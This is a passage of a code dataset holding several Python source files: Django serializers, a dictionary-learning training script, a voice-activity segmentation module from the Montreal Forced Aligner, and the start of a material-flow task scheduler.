Orders\n fields = ('url', 'user', 'ai', 'color', 'completed', 'date', 'name', 'quantity', 'size')\n\nclass FavoritesSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(queryset=UserAlem.objects.all(), slug_field='username')\n\n class Meta:\n model = Favorites\n fields = ('url', 'user', 'ai', 'color', 'date', 'name', 'size')\n\nclass UserAlemSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = UserAlem\n fields = ('url', 'username', 'phone', 'email')","repo_name":"ilviirgroup/alemAdminDjango","sub_path":"alemsite/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37234995631","text":"#two layer dictionary learning: ADMM-MLDLSI 0.7864269788182834\n\nimport scipy.io\nimport time\nimport pdb\nimport numpy as np\nfrom SSDL_GU import *\nfrom LocalClassifier import *\nfrom DictUpdate import *\nfrom MLDLSI2_MUL import *\nfrom learning_incoherent_dictionary import *\nfrom sklearn.decomposition import SparseCoder\nfrom numpy.linalg import norm\nfrom numpy import linalg as LA\nimport sys\nfrom sklearn import preprocessing\nfrom sklearn.neighbors import NearestNeighbors\nfrom mnist import MNIST\nfrom PIL import Image\nimport math\nimport os\nimport cv2\nimport random\nfrom numpy.matlib import repmat\nimport copy\nimport scipy.io as scio\nfrom li2nsvm_multiclass_lbfgs import *\n\ndef DefaultModelParams():\n params=Params()\n params.reg_mode = 2;\n params.the_lambda = 0.01;\n params.theta = 30.0;\n params.kappa = 2.5;\n params.beta = 0.05;\n params.reg_type = 'l1';\n params.lambda_min = 10;\n params.lambda_max = 150;\n params.lla_iter = 5;\n params.L = 0;\n params.positive = False;\n params.project = False;\n params.l2err = (8**2)*(1.15**2)*((1/255)**2);\n return params\n\nMAX_Average_Precision=0.0\n\nwhile True:\n\n atom_n=300\n transform_n_nonzero_coefs_1=30\n atom_n_2=30\n transform_n_nonzero_coefs_2=30\n data = scipy.io.loadmat('T4.mat') # 读取mat文件\n D_init = scipy.io.loadmat('D_init.mat')['D0_reg'][0] # 读取mat文件\n train_data=data['train_data']\n train_data_reg=preprocessing.normalize(train_data.T, norm='l2').T\n train_Annotation=data['train_Annotation']\n train_Annotation=train_Annotation.astype(int)\n test_data=data['test_data']\n test_data_reg=preprocessing.normalize(test_data.T, norm='l2').T\n test_Annotation=data['test_Annotation']\n test_Annotation=test_Annotation.astype(int)\n testNum=test_data.shape[1]\n labelNum=test_Annotation.shape[0]\n featureDim=test_data.shape[0]\n atomNum=[atom_n,atom_n,atom_n,atom_n,atom_n]\n one_label_data=np.empty(5,dtype=object)\n one_label_data_all=np.zeros((train_data_reg.shape[0],0))\n for i in range(labelNum):\n one_label_data[i]=train_data_reg[:,np.where(train_Annotation[i]==1)[0]]\n one_label_data_all=np.hstack((one_label_data_all,one_label_data[i]))\n y = np.zeros(one_label_data_all.shape[1],dtype=int)\n start=0\n for i in range(labelNum):\n end=start+one_label_data[i].shape[1]\n y[start:end]=i\n start=end\n lagrangian_multiplier=np.zeros(one_label_data_all.shape)\n beta=6\n delta=1e-6\n gamma=np.random.rand(1)[0]\n gamma=0.5\n D_first_layer=np.random.randn(train_data.shape[0], atom_n)\n D_first_layer=preprocessing.normalize(D_first_layer.T, norm='l2').T\n G=np.empty(one_label_data_all.shape)\n H=np.empty(one_label_data_all.shape)\n Y_pre=np.zeros((labelNum,y.shape[0]),dtype=int)\n for i in range(y.shape[0]):\n Y_pre[y[i],i]=1\n W=np.random.randn(labelNum,atom_n)\n 
W=preprocessing.normalize(W.T, norm='l2').T\n G_W=np.empty(Y_pre.shape)\n H_W=np.empty(Y_pre.shape)\n lagrangian_multiplier_W=np.zeros(Y_pre.shape)\n\n params = Params()\n params.model = DefaultModelParams()\n params.model.lambda2 = 0.003\n params.model.lambda1 = 0.04\n params.mu0 = 0.0\n params.xmu0 = 0.05\n params.mu_mode = [-1]\n params.positive = False\n params.min_change = 1e-5\n params.batch_size = 0\n params.test_size = 0\n params.resume = False\n params.do_control_class = False\n params.xval_step = 10\n params.remember_factor = 0.4\n params.output_dir = 'results/dict'\n params.training_data = train_data_reg\n params.testing_data = []\n params.training_labels = train_Annotation\n params.testing_labels = []\n params.update_method = 'pg'\n params.debug = 0\n params.base_name = 'global'\n params.discard_unused_atoms = 0.005\n params.discard_constant_patches = 0.001\n params.dict_update = DictUpdate()\n params.dict_update.xcorr = 1\n params.max_iter=1000\n for l in range(5):\n print(l)\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_train = (coder.transform(one_label_data_all.T)).T\n G= (beta * D_first_layer @ X_train + 2 * one_label_data_all - lagrangian_multiplier) / (2 + beta)\n H= G + lagrangian_multiplier / beta - D_first_layer @ X_train\n for i in range(D_first_layer.shape[1]):\n Omega=X_train[i]@X_train[i]\n D_first_layer[:, i]= D_first_layer[:, i] + (H @ X_train[i]) / (Omega + delta)\n D_first_layer=preprocessing.normalize(D_first_layer.T, norm='l2').T\n lagrangian_multiplier=lagrangian_multiplier+gamma*beta*(G - D_first_layer @ X_train)\n\n G_W=(beta*W@X_train+2*Y_pre-lagrangian_multiplier_W)/(2+beta)\n H_W=G_W+lagrangian_multiplier_W/beta-W@X_train\n for i in range(D_first_layer.shape[1]):\n Omega=X_train[i]@X_train[i]\n W[:,i]=W[:,i]+(H_W@X_train[i])/(Omega+delta)\n W=preprocessing.normalize(W.T, norm='l2').T\n lagrangian_multiplier_W=lagrangian_multiplier_W+gamma*beta*(G_W-W@X_train)\n pass\n\n train_func2=None\n A_mean=None\n Dusage=None\n Uk=None\n bk=None\n D_sec_layer=None\n\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_test = (coder.transform(test_data_reg.T)).T\n # diff = np.sum(abs(test_data_reg - D @ X_test))\n # print(diff)\n # output=W@X_test\n # Average_Precision,Average_Precision1=Average_precision(output,test_Annotation)\n # print(Average_Precision)\n coder = SparseCoder(dictionary=D_first_layer.T, transform_n_nonzero_coefs=transform_n_nonzero_coefs_1,\n transform_algorithm=\"omp\")\n X_train_first_layer = (coder.transform(one_label_data_all.T)).T\n params.training_data=X_train_first_layer\n #这里是随机初始化字典\n D0_reg_layer2 = np.random.rand(labelNum, X_train_first_layer.shape[0], atom_n_2)\n params.D0=copy.deepcopy(D0_reg_layer2)\n # 现在随机初始化字典可以跑起来了 接下来用A1_sum来初始化字典\n # for i in range(labelNum):\n # Y_index_layer_2 = np.where(y == i)[0]\n # # random.shuffle(Y_index_layer_2)\n # D0_reg_layer2[i] = X_train_first_layer[:, Y_index_layer_2][:, :atom_n_2]\n # params.D0 = copy.deepcopy(D0_reg_layer2)\n train_func2 = MLDLSI2(params,y,atom_n_2)\n for r2 in range(params.max_iter):\n # D1,A_mean1,Dusage1,Uk1,bk1,A1_sum1,y,nonsense=train_func1(r2,False)\n D_sec_layer, A_mean, Dusage, Uk, bk, A1_sum2, y, is_finish = train_func2(r2, True, X_train_first_layer, 0)\n if is_finish:\n break\n\n testparam = Params()\n testparam.lambda1 = params.model.the_lambda\n testparam.lambda2 = 0.04\n A_test = 
X_test\n output1, output2, output3 = LocalClassifier(A_test, D_sec_layer, A_mean, testparam, Uk, bk, params.model.lambda1)\n # RankingLoss[m]=Ranking_loss(output1,test_Annotation)\n Average_Precision, Average_Precision1 = Average_precision(output1, test_Annotation)\n print()\n print(\"Average_Precision: \" + str(Average_Precision))\n print()\n if Average_Precision>0.78:\n break","repo_name":"zizhouwang/Dictionary-Learning","sub_path":"emldlsi_mul_ADMM_Lagrangian.py","file_name":"emldlsi_mul_ADMM_Lagrangian.py","file_ext":"py","file_size_in_byte":7272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"13981024323","text":"\"\"\"Multiprocessing functionality for VAD\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport typing\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, List, Union\n\nimport numpy\nimport numpy as np\nimport pynini\nimport pywrapfst\nfrom _kalpy.decoder import LatticeFasterDecoder, LatticeFasterDecoderConfig\nfrom _kalpy.fstext import GetLinearSymbolSequence\nfrom _kalpy.gmm import DecodableAmDiagGmmScaled\nfrom _kalpy.matrix import DoubleMatrix, FloatMatrix\nfrom _kalpy.util import SequentialBaseFloatVectorReader\nfrom kalpy.data import Segment\nfrom kalpy.decoder.training_graphs import TrainingGraphCompiler\nfrom kalpy.feat.cmvn import CmvnComputer\nfrom kalpy.feat.mfcc import MfccComputer\nfrom kalpy.feat.vad import VadComputer\nfrom kalpy.fstext.lexicon import LexiconCompiler\nfrom kalpy.utils import generate_read_specifier, read_kaldi_object\nfrom kalpy.utterance import Utterance as KalpyUtterance\nfrom sqlalchemy.orm import joinedload, subqueryload\n\nfrom montreal_forced_aligner.abc import KaldiFunction\nfrom montreal_forced_aligner.data import CtmInterval, MfaArguments\nfrom montreal_forced_aligner.db import File, Job, Speaker, Utterance\nfrom montreal_forced_aligner.exceptions import SegmenterError\nfrom montreal_forced_aligner.models import AcousticModel, G2PModel\n\ntry:\n import warnings\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n torch_logger = logging.getLogger(\"speechbrain.utils.torch_audio_backend\")\n torch_logger.setLevel(logging.ERROR)\n torch_logger = logging.getLogger(\"speechbrain.utils.train_logger\")\n torch_logger.setLevel(logging.ERROR)\n import torch\n from speechbrain.pretrained import VAD\n\n FOUND_SPEECHBRAIN = True\nexcept (ImportError, OSError):\n FOUND_SPEECHBRAIN = False\n VAD = None\n\nif TYPE_CHECKING:\n SpeakerCharacterType = Union[str, int]\n from dataclasses import dataclass\n\n from montreal_forced_aligner.abc import MetaDict\nelse:\n from dataclassy import dataclass\n\n__all__ = [\n \"SegmentTranscriptArguments\",\n \"SegmentVadArguments\",\n \"SegmentTranscriptFunction\",\n \"SegmentVadFunction\",\n \"get_initial_segmentation\",\n \"merge_segments\",\n \"segment_utterance_transcript\",\n \"segment_utterance_vad\",\n \"segment_utterance_vad_speech_brain\",\n]\n\n\n@dataclass\nclass SegmentVadArguments(MfaArguments):\n \"\"\"Arguments for :class:`~montreal_forced_aligner.segmenter.SegmentVadFunction`\"\"\"\n\n vad_path: Path\n segmentation_options: MetaDict\n\n\n@dataclass\nclass SegmentTranscriptArguments(MfaArguments):\n \"\"\"Arguments for :class:`~montreal_forced_aligner.segmenter.SegmentTranscriptFunction`\"\"\"\n\n acoustic_model: AcousticModel\n vad_model: typing.Optional[VAD]\n lexicon_compilers: typing.Dict[int, LexiconCompiler]\n mfcc_options: MetaDict\n vad_options: MetaDict\n segmentation_options: 
MetaDict\n decode_options: MetaDict\n\n\ndef segment_utterance_transcript(\n acoustic_model: AcousticModel,\n utterance: KalpyUtterance,\n lexicon_compiler: LexiconCompiler,\n vad_model: VAD,\n segmentation_options: MetaDict,\n cmvn: DoubleMatrix = None,\n fmllr_trans: FloatMatrix = None,\n mfcc_options: MetaDict = None,\n vad_options: MetaDict = None,\n g2p_model: G2PModel = None,\n interjection_words: typing.List[str] = None,\n acoustic_scale: float = 0.1,\n beam: float = 16.0,\n lattice_beam: float = 10.0,\n max_active: int = 7000,\n min_active: int = 200,\n prune_interval: int = 25,\n beam_delta: float = 0.5,\n hash_ratio: float = 2.0,\n prune_scale: float = 0.1,\n boost_silence: float = 1.0,\n):\n \"\"\"\n Split an utterance and its transcript into multiple transcribed utterances\n\n Parameters\n ----------\n acoustic_model: :class:`~montreal_forced_aligner.models.AcousticModel`\n Acoustic model to use in splitting transcriptions\n utterance: :class:`~kalpy.utterance.Utterance`\n Utterance to split\n lexicon_compiler :class:`~kalpy.fstext.lexicon.LexiconCompiler`\n Lexicon compiler\n vad_model :class:`~speechbrain.pretrained.VAD` or None\n VAD model from SpeechBrain, if None, then Kaldi's energy-based VAD is used\n segmentation_options: dict[str, Any]\n Segmentation options\n cmvn: :class:`~_kalpy.matrix.DoubleMatrix`\n CMVN stats to apply\n fmllr_trans: :class:`~_kalpy.matrix.FloatMatrix`\n fMLLR transformation matrix for speaker adaptation\n mfcc_options: dict[str, Any], optional\n MFCC options for energy based VAD\n vad_options: dict[str, Any], optional\n Options for energy based VAD\n acoustic_scale: float, optional\n Defaults to 0.1\n beam: float, optional\n Defaults to 16\n lattice_beam: float, optional\n Defaults to 10\n max_active: int, optional\n Defaults to 7000\n min_active: int, optional\n Defaults to 250\n prune_interval: int, optional\n Defaults to 25\n beam_delta: float, optional\n Defaults to 0.5\n hash_ratio: float, optional\n Defaults to 2.0\n prune_scale: float, optional\n Defaults to 0.1\n boost_silence: float, optional\n Defaults to 1.0\n\n Returns\n -------\n list[:class:`~kalpy.utterance.Utterance`]\n Split utterances\n\n \"\"\"\n graph_compiler = TrainingGraphCompiler(\n acoustic_model.alignment_model_path,\n acoustic_model.tree_path,\n lexicon_compiler,\n lexicon_compiler.word_table,\n )\n if utterance.cmvn_string:\n cmvn = read_kaldi_object(DoubleMatrix, utterance.cmvn_string)\n if utterance.fmllr_string:\n fmllr_trans = read_kaldi_object(FloatMatrix, utterance.fmllr_string)\n if cmvn is None and acoustic_model.uses_cmvn:\n utterance.generate_mfccs(acoustic_model.mfcc_computer)\n cmvn_computer = CmvnComputer()\n cmvn = cmvn_computer.compute_cmvn_from_features([utterance.mfccs])\n current_transcript = utterance.transcript\n if vad_model is None:\n segments = segment_utterance_vad(\n utterance, mfcc_options, vad_options, segmentation_options\n )\n else:\n segments = segment_utterance_vad_speech_brain(utterance, vad_model, segmentation_options)\n\n config = LatticeFasterDecoderConfig()\n config.beam = beam\n config.lattice_beam = lattice_beam\n config.max_active = max_active\n config.min_active = min_active\n config.prune_interval = prune_interval\n config.beam_delta = beam_delta\n config.hash_ratio = hash_ratio\n config.prune_scale = prune_scale\n new_utts = []\n am, transition_model = acoustic_model.acoustic_model, acoustic_model.transition_model\n if boost_silence != 1.0:\n am.boost_silence(transition_model, lexicon_compiler.silence_symbols, boost_silence)\n 
for seg in segments:\n new_utt = KalpyUtterance(seg, current_transcript)\n new_utt.generate_mfccs(acoustic_model.mfcc_computer)\n if acoustic_model.uses_cmvn:\n new_utt.apply_cmvn(cmvn)\n feats = new_utt.generate_features(\n acoustic_model.mfcc_computer,\n acoustic_model.pitch_computer,\n lda_mat=acoustic_model.lda_mat,\n fmllr_trans=fmllr_trans,\n )\n unknown_words = []\n unknown_word_index = 0\n for w in new_utt.transcript.split():\n if not lexicon_compiler.word_table.member(w):\n unknown_words.append(w)\n fst = graph_compiler.compile_fst(new_utt.transcript, interjection_words)\n decodable = DecodableAmDiagGmmScaled(am, transition_model, feats, acoustic_scale)\n\n d = LatticeFasterDecoder(fst, config)\n ans = d.Decode(decodable)\n if not ans:\n raise SegmenterError(f\"Did not successfully decode: {current_transcript}\")\n ans, decoded = d.GetBestPath()\n if decoded.NumStates() == 0:\n raise SegmenterError(\"Error getting best path from decoder for utterance\")\n alignment, words, weight = GetLinearSymbolSequence(decoded)\n\n words = words[:-1]\n new_transcript = []\n for w in words:\n w = lexicon_compiler.word_table.find(w)\n if w == lexicon_compiler.oov_word:\n w = unknown_words[unknown_word_index]\n unknown_word_index += 1\n new_transcript.append(w)\n transcript = \" \".join(new_transcript)\n if interjection_words:\n current_transcript = align_interjection_words(\n transcript, current_transcript, interjection_words, lexicon_compiler\n )\n else:\n current_transcript = \" \".join(current_transcript.split()[len(words) :])\n new_utt.transcript = transcript\n new_utt.mfccs = None\n new_utt.cmvn_string = utterance.cmvn_string\n new_utt.fmllr_string = utterance.fmllr_string\n new_utts.append(new_utt)\n if current_transcript:\n new_utts[-1].transcript += \" \" + current_transcript\n return new_utts\n\n\ndef align_interjection_words(\n transcript,\n original_transcript,\n interjection_words: typing.List[str],\n lexicon_compiler: LexiconCompiler,\n):\n g = pynini.Fst()\n start_state = g.add_state()\n g.set_start(start_state)\n for w in original_transcript.split():\n word_symbol = lexicon_compiler.to_int(w)\n word_initial_state = g.add_state()\n for iw in interjection_words:\n if not lexicon_compiler.word_table.member(iw):\n continue\n iw_symbol = lexicon_compiler.to_int(iw)\n g.add_arc(\n word_initial_state - 1,\n pywrapfst.Arc(\n iw_symbol,\n lexicon_compiler.word_table.find(\"<eps>\"),\n pywrapfst.Weight(g.weight_type(), 4.0),\n word_initial_state,\n ),\n )\n word_final_state = g.add_state()\n g.add_arc(\n word_initial_state,\n pywrapfst.Arc(\n word_symbol, word_symbol, pywrapfst.Weight.one(g.weight_type()), word_final_state\n ),\n )\n g.add_arc(\n word_initial_state - 1,\n pywrapfst.Arc(\n word_symbol, word_symbol, pywrapfst.Weight.one(g.weight_type()), word_final_state\n ),\n )\n g.set_final(word_initial_state, pywrapfst.Weight.one(g.weight_type()))\n g.set_final(word_final_state, pywrapfst.Weight.one(g.weight_type()))\n\n a = pynini.accep(\n \" \".join(\n [\n x if lexicon_compiler.word_table.member(x) else lexicon_compiler.oov_word\n for x in transcript.split()\n ]\n ),\n token_type=lexicon_compiler.word_table,\n )\n interjections_removed = (\n pynini.compose(a, g).project(\"output\").string(lexicon_compiler.word_table)\n )\n return \" \".join(original_transcript.split()[len(interjections_removed.split()) :])\n\n\ndef get_initial_segmentation(frames: numpy.ndarray, frame_shift: float) -> List[CtmInterval]:\n \"\"\"\n Compute initial segmentation over voice activity\n\n Parameters\n 
----------\n frames: list[Union[int, str]]\n List of frames with VAD output\n frame_shift: float\n Frame shift of features in seconds\n\n Returns\n -------\n List[CtmInterval]\n Initial segmentation\n \"\"\"\n segments = []\n cur_segment = None\n silent_frames = 0\n non_silent_frames = 0\n for i in range(frames.shape[0]):\n f = frames[i]\n if int(f) > 0:\n non_silent_frames += 1\n if cur_segment is None:\n cur_segment = CtmInterval(begin=i * frame_shift, end=0, label=\"speech\")\n else:\n silent_frames += 1\n if cur_segment is not None:\n cur_segment.end = (i - 1) * frame_shift\n segments.append(cur_segment)\n cur_segment = None\n if cur_segment is not None:\n cur_segment.end = len(frames) * frame_shift\n segments.append(cur_segment)\n return segments\n\n\ndef merge_segments(\n segments: List[CtmInterval],\n min_pause_duration: float,\n max_segment_length: float,\n min_segment_length: float,\n) -> List[CtmInterval]:\n \"\"\"\n Merge segments together\n\n Parameters\n ----------\n segments: SegmentationType\n Initial segments\n min_pause_duration: float\n Minimum amount of silence time to mark an utterance boundary\n max_segment_length: float\n Maximum length of segments before they're broken up\n min_segment_length: float\n Minimum length of segments returned\n\n Returns\n -------\n List[CtmInterval]\n Merged segments\n \"\"\"\n merged_segments = []\n snap_boundary_threshold = min_pause_duration / 2\n for s in segments:\n if (\n not merged_segments\n or s.begin > merged_segments[-1].end + min_pause_duration\n or s.end - merged_segments[-1].begin > max_segment_length\n ):\n if s.end - s.begin > min_pause_duration:\n if merged_segments and snap_boundary_threshold:\n boundary_gap = s.begin - merged_segments[-1].end\n if boundary_gap < snap_boundary_threshold:\n half_boundary = boundary_gap / 2\n else:\n half_boundary = snap_boundary_threshold / 2\n merged_segments[-1].end += half_boundary\n s.begin -= half_boundary\n\n merged_segments.append(s)\n else:\n merged_segments[-1].end = s.end\n return [x for x in merged_segments if x.end - x.begin > min_segment_length]\n\n\ndef segment_utterance_vad(\n utterance: KalpyUtterance,\n mfcc_options: MetaDict,\n vad_options: MetaDict,\n segmentation_options: MetaDict,\n) -> typing.List[Segment]:\n mfcc_computer = MfccComputer(**mfcc_options)\n vad_computer = VadComputer(**vad_options)\n feats = mfcc_computer.compute_mfccs_for_export(utterance.segment, compress=False)\n vad = vad_computer.compute_vad(feats).numpy()\n segments = get_initial_segmentation(vad, mfcc_computer.frame_shift)\n segments = merge_segments(\n segments,\n segmentation_options[\"close_th\"],\n segmentation_options[\"large_chunk_size\"],\n segmentation_options[\"len_th\"],\n )\n new_segments = []\n for s in segments:\n seg = Segment(\n utterance.segment.file_path,\n s.begin + utterance.segment.begin,\n s.end + utterance.segment.begin,\n utterance.segment.channel,\n )\n new_segments.append(seg)\n return new_segments\n\n\ndef segment_utterance_vad_speech_brain(\n utterance: KalpyUtterance, vad_model: VAD, segmentation_options: MetaDict\n) -> typing.List[Segment]:\n y = utterance.segment.wave\n prob_chunks = vad_model.get_speech_prob_chunk(\n torch.tensor(y[np.newaxis, :], device=vad_model.device)\n ).cpu()\n prob_th = vad_model.apply_threshold(\n prob_chunks,\n activation_th=segmentation_options[\"activation_th\"],\n deactivation_th=segmentation_options[\"deactivation_th\"],\n ).float()\n # Compute the boundaries of the speech segments\n boundaries = vad_model.get_boundaries(prob_th, 
output_value=\"seconds\")\n boundaries += utterance.segment.begin\n\n # Apply energy-based VAD on the detected speech segments\n if segmentation_options[\"apply_energy_VAD\"]:\n boundaries = vad_model.energy_VAD(\n utterance.segment.file_path,\n boundaries,\n activation_th=segmentation_options[\"en_activation_th\"],\n deactivation_th=segmentation_options[\"en_deactivation_th\"],\n )\n\n # Merge short segments\n boundaries = vad_model.merge_close_segments(\n boundaries, close_th=segmentation_options[\"close_th\"]\n )\n\n # Remove short segments\n boundaries = vad_model.remove_short_segments(boundaries, len_th=segmentation_options[\"len_th\"])\n\n # Double check speech segments\n if segmentation_options[\"double_check\"]:\n boundaries = vad_model.double_check_speech_segments(\n boundaries, utterance.segment.file_path, speech_th=segmentation_options[\"speech_th\"]\n )\n boundaries[:, 0] -= round(segmentation_options[\"close_th\"] / 2, 3)\n boundaries[:, 1] += round(segmentation_options[\"close_th\"] / 2, 3)\n boundaries = boundaries.numpy()\n segments = []\n for i in range(boundaries.shape[0]):\n begin, end = boundaries[i]\n begin = max(begin, 0)\n end = min(end, utterance.segment.end)\n seg = Segment(\n utterance.segment.file_path, float(begin), float(end), utterance.segment.channel\n )\n segments.append(seg)\n return segments\n\n\nclass SegmentVadFunction(KaldiFunction):\n \"\"\"\n Multiprocessing function to generate segments from VAD output.\n\n See Also\n --------\n :meth:`montreal_forced_aligner.segmenter.Segmenter.segment_vad`\n Main function that calls this function in parallel\n :meth:`montreal_forced_aligner.segmenter.VadSegmenter.segment_vad_arguments`\n Job method for generating arguments for this function\n :kaldi_utils:`segmentation.pl`\n Kaldi utility\n\n Parameters\n ----------\n args: :class:`~montreal_forced_aligner.segmenter.SegmentVadArguments`\n Arguments for the function\n \"\"\"\n\n def __init__(self, args: SegmentVadArguments):\n super().__init__(args)\n self.vad_path = args.vad_path\n self.segmentation_options = args.segmentation_options\n\n def _run(self):\n \"\"\"Run the function\"\"\"\n reader = SequentialBaseFloatVectorReader(generate_read_specifier(self.vad_path))\n\n while not reader.Done():\n utt_id = reader.Key()\n frames = reader.Value()\n initial_segments = get_initial_segmentation(\n frames.numpy(), self.segmentation_options[\"frame_shift\"]\n )\n\n merged = merge_segments(\n initial_segments,\n self.segmentation_options[\"close_th\"],\n self.segmentation_options[\"large_chunk_size\"],\n self.segmentation_options[\"len_th\"],\n )\n self.callback((int(utt_id.split(\"-\")[-1]), merged))\n reader.Next()\n reader.Close()\n\n\nclass SegmentTranscriptFunction(KaldiFunction):\n \"\"\"\n Multiprocessing function to segment utterances with transcripts from VAD output.\n\n See Also\n --------\n :meth:`montreal_forced_aligner.segmenter.Segmenter.segment_vad`\n Main function that calls this function in parallel\n :meth:`montreal_forced_aligner.segmenter.TranscriptionSegmenter.segment_transcript_arguments`\n Job method for generating arguments for this function\n :kaldi_utils:`segmentation.pl`\n Kaldi utility\n\n Parameters\n ----------\n args: :class:`~montreal_forced_aligner.segmenter.SegmentTranscriptArguments`\n Arguments for the function\n \"\"\"\n\n def __init__(self, args: SegmentTranscriptArguments):\n super().__init__(args)\n self.acoustic_model = args.acoustic_model\n self.vad_model = args.vad_model\n self.lexicon_compilers = args.lexicon_compilers\n 
self.segmentation_options = args.segmentation_options\n self.mfcc_options = args.mfcc_options\n self.vad_options = args.vad_options\n self.decode_options = args.decode_options\n self.speechbrain = self.vad_model is not None\n\n def _run(self):\n \"\"\"Run the function\"\"\"\n with self.session() as session:\n job: Job = (\n session.query(Job)\n .options(joinedload(Job.corpus, innerjoin=True), subqueryload(Job.dictionaries))\n .filter(Job.id == self.job_name)\n .first()\n )\n\n for d in job.dictionaries:\n utterances = (\n session.query(Utterance)\n .join(Utterance.speaker)\n .options(\n joinedload(Utterance.file).joinedload(File.sound_file),\n joinedload(Utterance.speaker),\n )\n .filter(\n Utterance.job_id == self.job_name,\n Utterance.duration >= 0.1,\n Speaker.dictionary_id == d.id,\n )\n .order_by(Utterance.kaldi_id)\n )\n for u in utterances:\n new_utterances = segment_utterance_transcript(\n self.acoustic_model,\n u.to_kalpy(),\n self.lexicon_compilers[d.id],\n self.vad_model if self.speechbrain else None,\n self.segmentation_options,\n mfcc_options=self.mfcc_options if not self.speechbrain else None,\n vad_options=self.vad_options if not self.speechbrain else None,\n **self.decode_options,\n )\n self.callback((u.id, new_utterances))\n","repo_name":"MontrealCorpusTools/Montreal-Forced-Aligner","sub_path":"montreal_forced_aligner/vad/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":21025,"program_lang":"python","lang":"en","doc_type":"code","stars":1099,"dataset":"github-code","pt":"81"} +{"seq_id":"21360229629","text":"\"\"\" Contains Materialflow and MaterialFlowCallbacks class \"\"\"\n\n# standard libraries\nimport uuid\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# local sources\nfrom lotlan_scheduler.api.event import Event\nfrom lotlan_scheduler.api.transportorder import TransportOrder\n\nfrom lotlan_scheduler.logger.sqlite_logger import SQLiteLogger\n\nfrom lotlan_scheduler.petri_net.logic import PetriNetLogic\n\nfrom lotlan_scheduler.petri_net.generator import PetriNetGenerator\n\n# globals defines\nfrom lotlan_scheduler.defines import PetriNetConstants, LogicConstants\n\nclass MaterialFlowCallbacks(object):\n \"\"\"\n Contains lists of registered callback functions\n for different states in the scheduling process\n \"\"\"\n def __init__(self):\n self.triggered_by_cb = []\n self.pickup_finished_cb = []\n self.delivery_finished_cb = []\n self.finished_by_cb = []\n self.next_to_cb = []\n self.task_finished_cb = []\n self.all_finished_cb = []\n\nclass MaterialFlow():\n \"\"\" Represents an abstract materialflow \"\"\"\n\n def __init__(self, _uuid, lotlan_structure, lotlan_string, tasks_in_mf, test_flag=False):\n self._uuid = _uuid\n self.name = \"\"\n self._is_running = True\n self.materialflow_callbacks = MaterialFlowCallbacks()\n self.tasks_in_mf = tasks_in_mf\n self.lotlan_structure = lotlan_structure\n self.tasks = {}\n self.ids = {}\n self.triggered_by_events = {}\n self.finished_by_events = {}\n self.event_instances = {}\n self.not_done_parents = {} # 0 if all parent tasks are done\n self.tasks_done = {}\n self.test_flag = test_flag\n self.parent_count = {}\n self.lotlan_string = lotlan_string\n self.petri_net_generator = PetriNetGenerator(tasks_in_mf,\n self.event_instances,\n test_flag=test_flag)\n self.logger = None\n self.call_graph = None\n self.startable_tasks = None\n self.cycle_in_call_graph = None\n self.petri_net_logic = None\n\n def is_running(self):\n return self._is_running\n\n def start(self):\n \"\"\"\n 
Starts the materialflow scheduling\n \"\"\"\n self.logger = SQLiteLogger()\n self.logger.insert_materialflow_in_sql(self._uuid, self.lotlan_string)\n\n self.initialize_tasks(self.tasks_in_mf)\n\n if self.tasks_in_mf:\n self.name = self.tasks_in_mf[0].name\n\n self.call_graph = self.create_call_graph(self.tasks_in_mf)\n\n cycles = list(nx.simple_cycles(self.call_graph))\n self.cycle_in_call_graph = len(cycles) > 0\n\n self.startable_tasks = self.find_startable_tasks(self.call_graph, self.tasks_in_mf)\n\n for instance in self.lotlan_structure.instances.values():\n if instance.template_name == \"Event\":\n self.event_instances[instance.name] = instance\n task_representations = self.petri_net_generator.generate_task_nets()\n self.petri_net_logic = PetriNetLogic(task_representations, self.test_flag)\n\n self.create_event_information_list()\n self.start_tasks(self.startable_tasks)\n\n def start_tasks(self, tasks):\n \"\"\"\n Starts scheduling of the given tasks\n\n if a task has a triggeredBy statement it waits for incoming events\n otherwise the transport_order can be executed and so next_to is called\n \"\"\"\n next_tos = []\n for task in tasks:\n uuid_ = self.ids[task.name]\n transport_order = task.transport_order\n pickup = transport_order.pickup_tos.location\n delivery = transport_order.delivery_tos.location\n\n transport_order.state = TransportOrder.TransportOrderState.TASK_STARTED\n state = transport_order.state\n self.logger.insert_transport_order(self._uuid, uuid_, state, pickup, delivery)\n\n if self.triggered_by_events[task.name]:\n tb_events_of_task = self.triggered_by_events[task.name]\n self.petri_net_logic.set_awaited_events(task, tb_events_of_task)\n\n self.wait_for_triggered_by(uuid_, self.triggered_by_events[task.name])\n\n transport_order.state = TransportOrder.TransportOrderState.TASK_WAIT_FOR_TRIGGERED_BY\n state = transport_order.state\n self.logger.insert_transport_order(self._uuid, uuid_, state, pickup, delivery)\n else:\n task_started_event = Event(PetriNetConstants.TASK_STARTED_PLACE, \"\", \"Boolean\",\n comparator=\"\", value=True)\n self.petri_net_logic.set_awaited_events(task, [task_started_event])\n self.fire_event(uuid_, task_started_event)\n next_tos.append(task)\n\n self.next_to(next_tos)\n\n def create_call_graph(self, tasks):\n \"\"\"\n Creates a graph where every node is a task\n and a directed edge represents an onDone\n \"\"\"\n call_graph = nx.DiGraph()\n for task in tasks:\n call_graph.add_node(task.name)\n for child in task.on_done:\n call_graph.add_edge(task.name, child)\n return call_graph\n\n def save_call_graph_img(self, filename):\n \"\"\" Saves the generated call graph of the materialflow as image \"\"\"\n nx.draw(self.call_graph, with_labels=True)\n plt.savefig(filename, dpi=300, bbox_inches=\"tight\")\n\n def find_startable_tasks(self, graph, tasks):\n \"\"\"\n Finds tasks that can be started:\n task with no incoming edges in graph\n \"\"\"\n startable_tasks = []\n for task in tasks:\n incoming_edges = 0\n 